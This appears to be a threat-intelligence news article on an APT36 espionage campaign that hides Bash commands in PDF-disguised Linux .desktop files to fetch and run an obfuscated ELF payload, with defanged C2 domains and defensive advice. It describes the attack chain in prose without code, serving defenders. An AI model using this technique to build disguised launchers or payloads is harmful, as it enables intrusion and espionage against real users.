A Pakistan-linked advanced persistent threat (APT) group has been discovered using a sophisticated new attack vector, abusing Linux .desktop files to deploy custom malware in a targeted espionage campaign against Indian government and defense entities.
The group, tracked as APT36 (also known as Transparent Tribe, Operation C-Major, and Mythic Leopard), has been active since at least 2013 and is known for its persistent focus on Indian targets. Its latest campaign, uncovered on August 1, 2025, and still ongoing, marks a significant evolution in its tactics by targeting Linux systems, specifically those running India’s indigenous BOSS (Bharat Operating System Solutions).
The Attack Vector: A Wolf in Sheep’s Clothing
The campaign begins with a spear-phishing email containing a malicious ZIP archive named Meeting_Notice_Ltr_ID1543ops.pdf_.zip.
Inside, instead of a PDF, is a malicious .desktop file—a shortcut file type used by Linux desktop environments to launch applications. This file is cunningly disguised:
- It uses a PDF icon to trick the target into believing it is a document.
- The
Exec= line, which normally points to a legitimate application, contains hidden Bash commands.
- It is configured to run as an application and can be set for autostart, ensuring persistence.
When executed, the file performs a multi-stage attack:
- Decoy: It opens a benign PDF in Firefox to maintain the victim’s illusion.
- Payload Retrieval: It silently downloads a hex-encoded payload from the attacker-controlled domain
securestore[.]cv.
- Execution: It decodes and executes the payload in the background, allowing malware to operate completely unnoticed.
The Malware: Stealthy and Persistent
The final payload is a sophisticated, statically-linked 64-bit ELF executable designed for x86-64 Linux systems. Analysis reveals signs of heavy obfuscation and packing, including a huge section header offset and missing section names, designed to thwart analysis.
Key capabilities of the malware include:
- Command and Control (C2): It embeds the hardcoded C2 address
modgovindia[.]space:4000.
- Stealthy Communication: It uses DNS queries and UDP sockets for communication, making its network traffic harder to detect and block.
- Persistence: It ensures it remains on infected systems by creating cron jobs and abusing systemd services.
- Espionage: Once established, it enables full data exfiltration and remote control by the attackers.
A Strategic Shift in Tactics
APT36 is historically known for targeting Windows systems with custom Remote Access Trojans (RATs) like Crimson and Peppy, which can exfiltrate data, capture screenshots, and even record webcam streams.
This shift to Linux demonstrates a strategic adaptation.
“The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies,” concludes a report from cybersecurity firm CYFIRMA. “Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”
While the Indian government remains its primary focus, APT36 has expanded its operations to adjacent sectors like education, research, and civil society, increasing the attack surface and risk for a broader range of organizations.
The Bottom Line for Defense: This campaign is a stark reminder that threat actors are continuously innovating. The abuse of trusted file types like .desktop files requires heightened user vigilance against spear-phishing, even from seemingly legitimate sources. For organizations, particularly in government and defense, implementing advanced threat detection capable of analyzing file behavior—not just its appearance—is critical to defending against these evolving, multi-platform threats.
